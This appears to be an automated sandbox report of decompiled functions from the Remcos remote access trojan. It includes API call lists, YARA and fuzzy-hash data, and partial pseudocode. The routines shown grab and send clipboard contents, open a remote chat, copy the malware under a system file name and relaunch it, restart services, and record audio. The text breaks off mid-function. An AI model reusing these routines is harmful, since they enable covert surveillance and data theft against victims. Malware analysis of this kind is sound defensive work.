                    				void* _v112;
                    				char _v116;
                    				char _v120;
                    				char _v140;
                    				void* _v176;
                    				void* __ebx;
                    				void* __ebp;
                    				intOrPtr* _t28;
                    				char* _t36;
                    				intOrPtr _t45;
                    				intOrPtr _t46;
                    				void* _t57;
                    				intOrPtr _t69;
                    				void* _t111;
                    				void* _t113;
                    				void* _t115;
                    				signed int _t117;
                    				void* _t120;
                    				void* _t121;
                    				void* _t122;
                    				void* _t123;
                    
                    				_t125 = __eflags;
                    				_t101 = __edx;
                    				_t69 = _a4;
                    				E004020EC(_t69,  &_v104, __edx, __eflags, _t69 + 0x1c);
                    				SetEvent( *(_t69 + 0x34));
                    				_t28 = E00401F95( &_v108);
                    				E004042A6( &_v108,  &_v60, 4, 0xffffffff);
                    				_t120 = (_t117 & 0xfffffff8) - 0x5c;
                    				E004020EC(_t69, _t120, _t101, _t125, 0x46c238);
                    				_t121 = _t120 - 0x18;
                    				E004020EC(_t69, _t121, _t101, _t125,  &_v76);
                    				E00417478( &_v140, _t101);
                    				_t122 = _t121 + 0x30;
                    				_t111 =  *_t28 - 0x3a;
                    				if(_t111 == 0) {
                    					E00401E49( &_v116, _t101, __eflags, 0);
                    					_t36 = E00402489();
                    					E00401F95(E00401E49( &_v120, _t101, __eflags, 0));
                    					_t101 = _t36;
                    					_t113 = E0040F69B();
                    					__eflags = _t113;
                    					if(_t113 == 0) {
                    						L7:
                    						E00401E74( &_v116, _t101);
                    						E00401FC7();
                    						E00401FC7();
                    						__eflags = 0;
                    						return 0;
                    					}
                    					 *0x46baec = E0040F931(_t113, "DisplayMessage");
                    					_t45 = E0040F931(_t113, "GetMessage");
                    					_t104 = "CloseChat";
                    					 *0x46bae4 = _t45;
                    					_t46 = E0040F931(_t113, "CloseChat");
                    					_t123 = _t122 - 0x18;
                    					 *0x46bae8 = _t46;
                    					 *0x46bae1 = 1;
                    					E004020EC(_t69, _t123, "CloseChat", __eflags, 0x46c2b8);
                    					_push(0x74);
                    					E00404AA4(_t69, _t69, _t104, __eflags);
                    					L10:
                    					_t115 = HeapCreate(0, 0, 0);
                    					__eflags =  *0x46bae4(_t115,  &_v140);
                    					if(__eflags != 0) {
                    						_t123 = _t123 - 0x18;
                    						E004020AB(_t69, _t123, _t104, __eflags, _v140, _t51);
                    						_push(0x3b);
                    						E00404AA4(_t69, _t69, _t104, __eflags);
                    						HeapFree(_t115, 0, _v176);
                    					}
                    					goto L10;
                    				}
                    				_t127 = _t111 != 1;
                    				if(_t111 != 1) {
                    					goto L7;
                    				}
                    				_t57 =  *0x46baec(E00401F95(E00401E49( &_v116, _t101, _t127, 0)));
                    				_t128 = _t57;
                    				if(_t57 == 0) {
                    					goto L7;
                    				}
                    				E0040427F(_t69,  &_v80, 0x45f6b8);
                    				_t101 =  &_v84;
                    				E0041739C(_t69, _t122 - 0x18,  &_v84);
                    				_push(0x3b);
                    				E00404AA4(_t69, _t69,  &_v84, _t128);
                    				E00401EF0();
                    				L4:
                    				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
                    					TranslateMessage( &_v52);
                    					DispatchMessageA( &_v52);
                    				}
                    				if(__eflags < 0) {
                    					goto L4;
                    				}
                    				goto L7;
			}

                    APIs
                    • SetEvent.KERNEL32(?,?), ref: 0040540C
                    • GetMessageA.USER32 ref: 004054BC
                    • TranslateMessage.USER32(?), ref: 004054CB
                    • DispatchMessageA.USER32 ref: 004054D6
                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046C2B8), ref: 0040558E
                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 004055C6
                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                    • String ID: CloseChat$DisplayMessage$GetMessage
                    • API String ID: 2956720200-749203953
                    • Opcode ID: eeb3916e9667347d05b0cb3d44af76e317f5dcc6587931f1597c26a158984571
                    • Instruction ID: 33c0be49a712d0e34ef4d1a509f5b181f9b779c8c834d9e011c7c8049845a3e0
                    • Opcode Fuzzy Hash: eeb3916e9667347d05b0cb3d44af76e317f5dcc6587931f1597c26a158984571
                    • Instruction Fuzzy Hash: DF41B371604300ABCA14FB76DD4A96F77A99B85704B40093FF911A75E2EF3C8909CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 59%
                    			E00418F59(void* __ebx, void* __ecx, void* __edx) {
                    				char _v204;
                    				void* __edi;
                    				struct HWND__* _t17;
                    				void _t22;
                    				intOrPtr _t24;
                    				intOrPtr _t25;
                    				void _t26;
                    				void _t28;
                    				void* _t30;
                    				void* _t34;
                    				signed int _t37;
                    				void* _t45;
                    				void* _t47;
                    				void* _t51;
                    				void* _t53;
                    				void* _t55;
                    				void* _t59;
                    
                    				_t36 = __ecx;
                    				_t34 = __ecx;
                    				AllocConsole();
                    				_t17 =  *0x46ca84(__ebx);
                    				 *0x46bebc = _t17;
                    				if(_t34 == 0) {
                    					ShowWindow(_t17, 0);
                    				}
                    				_push(_t45);
                    				E0043BCA5(_t36, "CONOUT$", "a", E00436A85(1));
                    				E00431F00(_t45,  &_v204, 0, 0xc8);
                    				_t47 =  &_v204 - 1;
                    				do {
                    					_t22 =  *(_t47 + 1);
                    					_t47 = _t47 + 1;
                    				} while (_t22 != 0);
                    				_t37 = 7;
                    				memcpy(_t47, "--------------------------\n", _t37 << 2);
                    				_t51 =  &_v204 - 1;
                    				do {
                    					_t24 =  *((intOrPtr*)(_t51 + 1));
                    					_t51 = _t51 + 1;
                    				} while (_t24 != 0);
                    				asm("movsd");
                    				asm("movsd");
                    				asm("movsd");
                    				_t53 =  &_v204 - 1;
                    				do {
                    					_t25 =  *((intOrPtr*)(_t53 + 1));
                    					_t53 = _t53 + 1;
                    				} while (_t25 != 0);
                    				asm("movsd");
                    				asm("movsd");
                    				asm("movsw");
                    				_t55 =  &_v204 - 1;
                    				do {
                    					_t26 =  *(_t55 + 1);
                    					_t55 = _t55 + 1;
                    				} while (_t26 != 0);
                    				_push(6);
                    				memcpy(_t55, "\n * BreakingSecurity.net\n", 0 << 2);
                    				asm("movsw");
                    				_t59 =  &_v204 - 1;
                    				do {
                    					_t28 =  *(_t59 + 1);
                    					_t59 = _t59 + 1;
                    					_t85 = _t28;
                    				} while (_t28 != 0);
                    				_t30 = memcpy(_t59, "--------------------------\n\n", 0 << 2);
                    				asm("movsb");
                    				return E0040482E(_t85, _t30, 7);
			}

                    APIs
                    • AllocConsole.KERNEL32(00000000), ref: 00418F65
                    • GetConsoleWindow.KERNEL32 ref: 00418F6B
                    • ShowWindow.USER32(00000000,00000000), ref: 00418F7E
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ConsoleWindow$AllocShow
                    • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.2.1 Pro$CONOUT$
                    • API String ID: 3461962499-1433448479
                    • Opcode ID: 5e41c7e5d6c1274375fb6b9893df5f16d0cea41a7d2c607dd3fd362ef9afd43d
                    • Instruction ID: 8874d77c640bab809850e105ba16a61c0d62e43c26ce2b4645c762b8c27fef00
                    • Opcode Fuzzy Hash: 5e41c7e5d6c1274375fb6b9893df5f16d0cea41a7d2c607dd3fd362ef9afd43d
                    • Instruction Fuzzy Hash: 0B214F32909A0526DF209F145C01FD6BB5AAF92744F008297F98C7F181DFA66DCA47AC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E00412D6D(void* __ebp, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
                    				void* __ebx;
                    				void* _t16;
                    				struct HWND__* _t23;
                    				void* _t38;
                    				void* _t41;
                    
                    				if(OpenClipboard(_t23) != 0) {
                    					EmptyClipboard();
                    					CloseClipboard();
                    					if(OpenClipboard(_t23) != 0) {
                    						_t38 = GetClipboardData(0xd);
                    						_t16 = GlobalLock(_t38);
                    						GlobalUnlock(_t38);
                    						CloseClipboard();
                    						_t29 =  !=  ? _t16 : 0x45f724;
                    						E0040427F(_t23,  &_a36,  !=  ? _t16 : 0x45f724);
                    						_t34 =  &_a32;
                    						E0041739C(_t23, _t41 - 0x18,  &_a32);
                    						_push(0x6b);
                    						E00404AA4(_t23, 0x46c780,  &_a32, _t16);
                    						E00401EF0();
                    					}
                    				}
                    				_t4 =  &_a16; // 0x404538
                    				E00401E74(_t4, _t34);
                    				E00401FC7();
                    				E00401FC7();
                    				return 0;
			}

                    APIs
                    • OpenClipboard.USER32 ref: 00412D6E
                    • EmptyClipboard.USER32 ref: 00412D7C
                    • CloseClipboard.USER32 ref: 00412D82
                    • OpenClipboard.USER32 ref: 00412D89
                    • GetClipboardData.USER32 ref: 00412D99
                    • GlobalLock.KERNEL32 ref: 00412DA2
                    • GlobalUnlock.KERNEL32(00000000), ref: 00412DAB
                    • CloseClipboard.USER32 ref: 00412DB1
                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                    • String ID: 8E@
                    • API String ID: 2172192267-787191786
                    • Opcode ID: a55376b11bc533d5a394031632125a0f54e1cc33cd7c52f5eff3875527e45b87
                    • Instruction ID: f0cc4c55be78af9b9a9fc71f204afdde4753d135cfa23ffdc9e1baeae117e680
                    • Opcode Fuzzy Hash: a55376b11bc533d5a394031632125a0f54e1cc33cd7c52f5eff3875527e45b87
                    • Instruction Fuzzy Hash: 990105312043009BC204BF72DC49AAEB6A5AF94787F04053EF916921A2DF388A59CA5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E00416472(char _a4) {
                    				intOrPtr _v28;
                    				struct _SERVICE_STATUS _v32;
                    				int _t22;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t22 = 0;
                    				_t27 = OpenSCManagerW(0, 0, 0x11);
                    				_t26 = OpenServiceW(_t27, E00401EEB( &_a4), 0xf003f);
                    				if(_t26 != 0) {
                    					if(ControlService(_t26, 1,  &_v32) != 0) {
                    						do {
                    							QueryServiceStatus(_t26,  &_v32);
                    						} while (_v28 != 1);
                    						StartServiceW(_t26, 0, 0);
                    						asm("sbb ebx, ebx");
                    						_t22 = 3;
                    						CloseServiceHandle(_t27);
                    						CloseServiceHandle(_t26);
                    					} else {
                    						CloseServiceHandle(_t27);
                    						CloseServiceHandle(_t26);
                    						_t22 = 2;
                    					}
                    				} else {
                    					CloseServiceHandle(_t27);
                    				}
                    				E00401EF0();
                    				return _t22;
			}

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00415E19,00000000), ref: 00416481
                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00415E19,00000000), ref: 00416498
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164A5
                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00415E19,00000000), ref: 004164B4
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164C5
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00415E19,00000000), ref: 004164C8
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: d59cadb48f7792a6efc1e83c6762a84be932b4ef907882e6865667c411f38059
                    • Instruction ID: 9fe600a8707d0c96f8df9479574b059baa9e236c1ba3853f5d66e3923bac8ba5
                    • Opcode Fuzzy Hash: d59cadb48f7792a6efc1e83c6762a84be932b4ef907882e6865667c411f38059
                    • Instruction Fuzzy Hash: 381182319403187BD721AF64DC89DFF3B7CDB45BA3700013AF90592192DB68DE46AAA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00441BEE(char _a4) {
                    				char _v8;
                    
                    				_t26 = _a4;
                    				_t52 =  *_a4;
                    				if( *_a4 != 0x457208) {
                    					E004401F5(_t52);
                    					_t26 = _a4;
                    				}
                    				E004401F5( *((intOrPtr*)(_t26 + 0x3c)));
                    				E004401F5( *((intOrPtr*)(_a4 + 0x30)));
                    				E004401F5( *((intOrPtr*)(_a4 + 0x34)));
                    				E004401F5( *((intOrPtr*)(_a4 + 0x38)));
                    				E004401F5( *((intOrPtr*)(_a4 + 0x28)));
                    				E004401F5( *((intOrPtr*)(_a4 + 0x2c)));
                    				E004401F5( *((intOrPtr*)(_a4 + 0x40)));
                    				E004401F5( *((intOrPtr*)(_a4 + 0x44)));
                    				E004401F5( *((intOrPtr*)(_a4 + 0x360)));
                    				_v8 =  &_a4;
                    				E00441AB4(5,  &_v8);
                    				_v8 =  &_a4;
                    				return E00441B04(4,  &_v8);
			}

                    APIs
                    • _free.LIBCMT ref: 00441C02
                      • Part of subcall function 004401F5: HeapFree.KERNEL32(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                      • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                    • _free.LIBCMT ref: 00441C0E
                    • _free.LIBCMT ref: 00441C19
                    • _free.LIBCMT ref: 00441C24
                    • _free.LIBCMT ref: 00441C2F
                    • _free.LIBCMT ref: 00441C3A
                    • _free.LIBCMT ref: 00441C45
                    • _free.LIBCMT ref: 00441C50
                    • _free.LIBCMT ref: 00441C5B
                    • _free.LIBCMT ref: 00441C69
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 2bfa3934cf4ed12b4cce651615ad6e530ea0c4f31933f6cdbe87120bbe1bf93e
                    • Instruction ID: 167aa965cb18310bd9f933f0fd8d2c8ac796a07d44e62cded6244bd04dd66799
                    • Opcode Fuzzy Hash: 2bfa3934cf4ed12b4cce651615ad6e530ea0c4f31933f6cdbe87120bbe1bf93e
                    • Instruction Fuzzy Hash: 9F11A775140148FFDB01FF99CC42CD93B65FF05354B0141AABB094B232DA36DA609B48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E1059B7F5(char __ecx, intOrPtr* __edx, WCHAR* _a4, char _a8, char _a12) {
                    				char _v9;
                    				int _v20;
                    				char _v44;
                    				char _v68;
                    				char _v92;
                    				char _v116;
                    				char _v140;
                    				char _v164;
                    				char _v188;
                    				char _v212;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				intOrPtr _t62;
                    				void* _t63;
                    				signed int _t67;
                    				signed int _t68;
                    				int _t70;
                    				void* _t79;
                    				void* _t91;
                    				void* _t92;
                    				int _t94;
                    				void* _t99;
                    				void* _t100;
                    				void* _t113;
                    				int _t115;
                    				intOrPtr _t118;
                    				WCHAR* _t123;
                    				int _t124;
                    				void* _t139;
                    				intOrPtr* _t152;
                    				int _t153;
                    				intOrPtr* _t207;
                    				int _t208;
                    				intOrPtr* _t235;
                    				void* _t236;
                    				void* _t239;
                    				void* _t249;
                    				void* _t250;
                    				intOrPtr _t254;
                    				void* _t257;
                    				void* _t259;
                    				intOrPtr* _t260;
                    
                    				_t235 = __edx;
                    				_v9 = __ecx;
                    				_t260 = __edx;
                    				_v20 = 0;
                    				_t257 = __edx + 2;
                    				do {
                    					_t62 =  *_t235;
                    					_t235 = _t235 + 2;
                    				} while (_t62 != 0);
                    				_t236 = _t235 - _t257;
                    				_t268 = _t236;
                    				if(_t236 == 0) {
                    					_t143 = _a4;
                    					_t238 = __ecx;
                    					_t63 = E105A8EC9( &_v92, __ecx, _t143);
                    					_t259 = 0x46c500;
                    					E10592D68(0x46c500, _t238, _t260, _t63);
                    				} else {
                    					CreateDirectoryW(E10592D59(0x46c530), 0);
                    					_t143 = _a4;
                    					_t139 = E10593F14(_t143,  &_v92, E10598382( &_v44, 0x46c530, _t268, 0x45f948), 0x46c530, _t268, _t143);
                    					_t259 = 0x46c500;
                    					E10592D68(0x46c500, _t138, _t260, _t139);
                    					E10592D5E();
                    				}
                    				E10592D5E();
                    				_t152 = E10592D59(_t259);
                    				_t67 = 0x46bb08;
                    				while(1) {
                    					_t239 =  *_t67;
                    					if(_t239 !=  *_t152) {
                    						break;
                    					}
                    					if(_t239 == 0) {
                    						L10:
                    						_t153 = 0;
                    						_t68 = 0;
                    						L12:
                    						if(_t68 != 0) {
                    							_t70 = CopyFileW("C:\Windows\SysWOW64\DpiScaling.exe", E10592D59(_t259), _t153);
                    							__eflags = _t70;
                    							if(_t70 != 0) {
                    								L23:
                    								E1059B704(0x46c4e8, E10592D59(0x46c4e8));
                    								__eflags = _a8 - 1;
                    								_pop(_t157);
                    								if(__eflags != 0) {
                    									L28:
                    									E10593F14(_t143,  &_v92, E105950ED(_t143,  &_v68, E105CA6ED(_t143, _t157, __eflags, 0x460008)), _t259, __eflags, 0x45ffec);
                    									E10592D5E();
                    									E105950ED(_t143,  &_v44, 0x460014);
                    									E105984DA(_t143,  &_v44, _t259, 0x460040);
                    									__eflags = _a12 - 1;
                    									if(__eflags == 0) {
                    										_t100 = E105950ED(0x4600ac,  &_v212, "C:\Windows\SysWOW64\DpiScaling.exe");
                    										E1059417F(E10593F14(0x4600ac,  &_v68, E10593F14(0x4600ac,  &_v116, E10593E9E( &_v140, E10593F14(0x4600ac,  &_v164, E105950ED(0x4600ac,  &_v188, 0x4600b0), _t259, __eflags, 0x45f464), _t100), _t259, __eflags, 0x45f464), _t259, __eflags, 0x4600ac));
                    										E10592D5E();
                    										E10592D5E();
                    										E10592D5E();
                    										E10592D5E();
                    										E10592D5E();
                    										E10592D5E();
                    									}
                    									_t79 = E105950ED(0x4600ac,  &_v116, 0x4600d0);
                    									E1059417F(E10593F14(0x4600ac,  &_v212, E10593E9E( &_v188, E10595297(0x4600ac,  &_v164, E105950ED(0x4600ac,  &_v68, 0x4600e0), __eflags, _t259), _t79), _t259, __eflags, 0x4600ac));
                    									E10592D5E();
                    									E10592D5E();
                    									E10592D5E();
                    									E10592D5E();
                    									E10592D5E();
                    									E105984DA(0x4600ac,  &_v44, _t259, 0x460140);
                    									_t91 = E10592D59( &_v92);
                    									_t92 = E105932F7();
                    									_t94 = E105A87B5(E10592D59( &_v44), _t92 + _t92, _t91, 0);
                    									__eflags = _t94;
                    									if(_t94 == 0) {
                    										L33:
                    										E10592D5E();
                    										return E10592D5E();
                    									} else {
                    										_t99 = ShellExecuteW(0, 0x45f6e4, E10592D59( &_v92), 0x45f724, 0x45f724, 0);
                    										__eflags = _t99 - 0x20;
                    										if(_t99 <= 0x20) {
                    											goto L33;
                    										}
                    										ExitProcess(0);
                    									}
                    								}
                    								_t113 = E10592D59(_t259);
                    								_t143 =  *0x453238;
                    								 *_t143(_t113, 7);
                    								_t249 = _t260 + 2;
                    								_t157 = 0;
                    								__eflags = 0;
                    								do {
                    									_t115 =  *_t260;
                    									_t260 = _t260 + 2;
                    									__eflags = _t115;
                    								} while (_t115 != 0);
                    								__eflags = _t260 - _t249;
                    								if(__eflags != 0) {
                    									_t157 = 0x46c530;
                    									 *_t143(E10592D59(0x46c530), 7);
                    								}
                    								goto L28;
                    							}
                    							__eflags = _v9 - 0x36;
                    							if(_v9 == 0x36) {
                    								goto L23;
                    							}
                    							_t207 = _t260;
                    							_t250 = _t207 + 2;
                    							do {
                    								_t118 =  *_t207;
                    								_t207 = _t207 + 2;
                    								__eflags = _t118 - _v20;
                    							} while (_t118 != _v20);
                    							_t208 = _t207 - _t250;
                    							__eflags = _t208;
                    							_push(_t143);
                    							if(_t208 == 0) {
                    								E10592D68(_t259, 0x36, _t260, E105A8EC9( &_v68, 0x36));
                    							} else {
                    								E10592D68(_t259, _t128, _t260, E10593F14(_t143,  &_v140, E10593F14(_t143,  &_v116, E105A8EC9( &_v68, 0x36, _t260), _t259, __eflags, 0x45f948), _t259, __eflags));
                    								E10592D5E();
                    								E10592D5E();
                    							}
                    							E10592D5E();
                    							_t123 = E10592D59(_t259);
                    							_t143 = 0x46bb08;
                    							_t124 = CopyFileW(0x46bb08, _t123, 0);
                    							__eflags = _t124;
                    							if(_t124 != 0) {
                    								goto L23;
                    							} else {
                    								E1059AC37(0x46bb08, _t259, 0x46bb08);
                    								return 0;
                    							}
                    						}
                    						E1059B704(0x46c4e8, E10592D59(0x46c4e8));
                    						return 1;
                    					}
                    					_t254 =  *((intOrPtr*)(_t67 + 2));
                    					if(_t254 !=  *((intOrPtr*)(_t152 + 2))) {
                    						break;
                    					}
                    					_t67 = _t67 + 4;
                    					_t152 = _t152 + 4;
                    					if(_t254 != 0) {
                    						continue;
                    					}
                    					goto L10;
                    				}
                    				asm("sbb eax, eax");
                    				_t68 = _t67 | 0x00000001;
                    				_t153 = 0;
                    				__eflags = 0;
                    				goto L12;
                    			}


                    APIs
                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 1059B82D
                    • CopyFileW.KERNEL32(C:\Windows\SysWOW64\DpiScaling.exe,00000000,00000000,00000000), ref: 1059B8F9
                    • CopyFileW.KERNEL32(C:\Windows\SysWOW64\DpiScaling.exe,00000000,00000000,00000000), ref: 1059B997
                    • ShellExecuteW.SHELL32(00000000,0045F6E4,00000000,0045F724,0045F724,00000000), ref: 1059BBC9
                    • ExitProcess.KERNEL32 ref: 1059BBD5
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: CopyFile$CreateDirectoryExecuteExitProcessShell
                    • String ID: 6$C:\Windows\SysWOW64\DpiScaling.exe$Remcos
                    • API String ID: 1208941977-2625985458
                    • Opcode ID: 2790b9d6b261eb0ed5398a12518422b092d0988f6fb304b9dfa6f8c1d56f2ab6
                    • Instruction ID: b28f064c6d40ea9ab774491be4a8d813731f9a680eb384232f47038ccbd7b813
                    • Opcode Fuzzy Hash: 2790b9d6b261eb0ed5398a12518422b092d0988f6fb304b9dfa6f8c1d56f2ab6
                    • Instruction Fuzzy Hash: 21A1C439A0020496D718EBA4DC9AEEE7B39EF94340F50406EF006A7194EF757E4BCA55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 74%
                    			E105A783A(void* __ecx, void* __edx, char _a4) {
                    				char _v24;
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t25;
                    				void* _t28;
                    				void* _t43;
                    				void* _t60;
                    				void* _t63;
                    				void* _t67;
                    				struct _SECURITY_ATTRIBUTES* _t89;
                    				void* _t109;
                    				void* _t111;
                    				intOrPtr* _t112;
                    				void* _t114;
                    				void* _t118;
                    
                    				_t103 = __edx;
                    				_t67 = __ecx;
                    				_t109 = __edx;
                    				if(E105A7A80( &_a4, __ecx, __ecx) == 0xffffffff) {
                    					_t63 = E10592D59( &_a4);
                    					_t103 = 0x30;
                    					E10592D68( &_a4, 0x30, _t111, E105A8EC9( &_v28, 0x30, _t63));
                    					E10592D5E();
                    				}
                    				_t25 = E105932F7();
                    				_t120 = _t25;
                    				if(_t25 == 0) {
                    					__eflags = PathFileExistsW(E10592D59( &_a4));
                    					if(__eflags != 0) {
                    						goto L4;
                    					} else {
                    						E10592EF2(_t67, _t114 - 0x18, 0x45f6bc);
                    						_push(0xa8);
                    						E10595912(_t67, 0x46ca18, _t103, __eflags);
                    					}
                    				} else {
                    					_t60 = E10592D59( &_a4);
                    					_t118 = _t114 - 0x18;
                    					E10592F5A(_t67, _t118, _t103, _t120, _t109);
                    					E105A88BC(_t60);
                    					_t114 = _t118 + 0x18;
                    					L4:
                    					_t28 = E105A8148( &_v124, _t67);
                    					_t108 = E10593E9E( &_v28, E10593F14(_t67,  &_v76, E1059ACD7( &_v100, 0x465a28, _t120,  &_a4), _t109, _t120, 0x465a18), _t28);
                    					E10593F14(_t67,  &_v52, _t32, _t109, _t120, 0x4659fc);
                    					E10592D5E();
                    					E10592D5E();
                    					E10592D5E();
                    					E10592D5E();
                    					mciSendStringW(E10592D59( &_v52), 0, 0, 0);
                    					_t112 =  *0x4533e8;
                    					 *_t112(0, 0, 0);
                    					_t115 = _t114 - 0x18;
                    					E10592EF2(0, _t114 - 0x18, 0x45f6bc);
                    					E10595912(0, 0x46ca18, _t32, 0, 0xa9, 0x465a38);
                    					_t43 = CreateEventA(0, 1, 0, 0);
                    					while(1) {
                    						L5:
                    						 *0x46bea8 = _t43;
                    						while(1) {
                    							_t122 = _t43;
                    							if(_t43 == 0) {
                    								break;
                    							}
                    							__eflags =  *0x46bea6;
                    							if( *0x46bea6 != 0) {
                    								 *_t112(0x465a44, 0, 0, 0);
                    								 *0x46bea6 = 0;
                    							}
                    							__eflags =  *0x46bea5;
                    							if( *0x46bea5 != 0) {
                    								 *_t112(0x465a50, 0, 0, 0);
                    								 *0x46bea5 = 0;
                    							}
                    							 *_t112(0x465a60,  &_v24, 0x14, 0);
                    							_t108 =  &_v24;
                    							_t89 = 0;
                    							while(1) {
                    								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(0x465a74 + _t89));
                    								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(0x465a74 + _t89))) {
                    									break;
                    								}
                    								_t89 =  &(_t89->nLength);
                    								__eflags = _t89 - 8;
                    								if(_t89 != 8) {
                    									continue;
                    								} else {
                    									SetEvent( *0x46bea8);
                    								}
                    								break;
                    							}
                    							__eflags = WaitForSingleObject( *0x46bea8, 0x1f4);
                    							if(__eflags != 0) {
                    								_t43 =  *0x46bea8;
                    							} else {
                    								CloseHandle( *0x46bea8);
                    								_t43 = 0;
                    								goto L5;
                    							}
                    						}
                    						 *_t112(0x465a7c, 0, 0, 0);
                    						 *_t112(0, 0, 0);
                    						E10592EF2(0, _t115 - 0x18, 0x45f6bc);
                    						E10595912(0, 0x46ca18, _t108, _t122, 0xaa, 0x465a88);
                    						E10592D5E();
                    						goto L21;
                    					}
                    				}
                    				L21:
                    				return E10592D5E();
                    			}


                    APIs
                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 105A791F
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,0045F6BC), ref: 105A7958
                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,0046C238), ref: 105A796E
                    • SetEvent.KERNEL32 ref: 105A79FC
                    • WaitForSingleObject.KERNEL32(000001F4), ref: 105A7A0D
                    • CloseHandle.KERNEL32 ref: 105A7A1D
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Event$CloseCreateExistsFileHandleObjectPathSendSingleStringWait
                    • String ID: open "$stopped
                    • API String ID: 1811012380-2801388145
                    • Opcode ID: 48db8bba4ea5dd42ea0582ef4651a692aab33a2f1f7291006520628776400043
                    • Instruction ID: a29429e916a463a19575ade6573810d1cd8e089f0a177452485aa5e97708d23b
                    • Opcode Fuzzy Hash: 48db8bba4ea5dd42ea0582ef4651a692aab33a2f1f7291006520628776400043
                    • Instruction Fuzzy Hash: 2451B77560020DBFD704ABB4DC9ADFF3F2CEB80285B50412EF506961A1EFA15E46C7A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E00415938() {
                    				intOrPtr* _t42;
                    				void* _t45;
                    				char* _t54;
                    				void* _t72;
                    				long _t78;
                    				void* _t83;
                    				struct _SECURITY_ATTRIBUTES* _t85;
                    				struct _SECURITY_ATTRIBUTES* _t92;
                    				void* _t131;
                    				void* _t132;
                    				void* _t140;
                    				void* _t141;
                    				void* _t146;
                    				intOrPtr _t147;
                    				void* _t148;
                    				void* _t149;
                    				void* _t150;
                    
                    				E004510A8(E0045265E, _t146);
                    				_push(_t141);
                    				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
                    				_t92 = 0;
                    				 *((intOrPtr*)(_t146 - 4)) = 0;
                    				_t149 =  *0x46bea0 - _t92; // 0x0
                    				if(_t149 == 0) {
                    					_t147 = _t147 - 0xc;
                    					_t131 = _t146 - 0x68;
                    					E004143BF(_t131);
                    					__imp__GdiplusStartup(0x46bea0, _t131, 0);
                    				}
                    				_t150 =  *0x46bd70 - _t92; // 0x0
                    				if(_t150 == 0) {
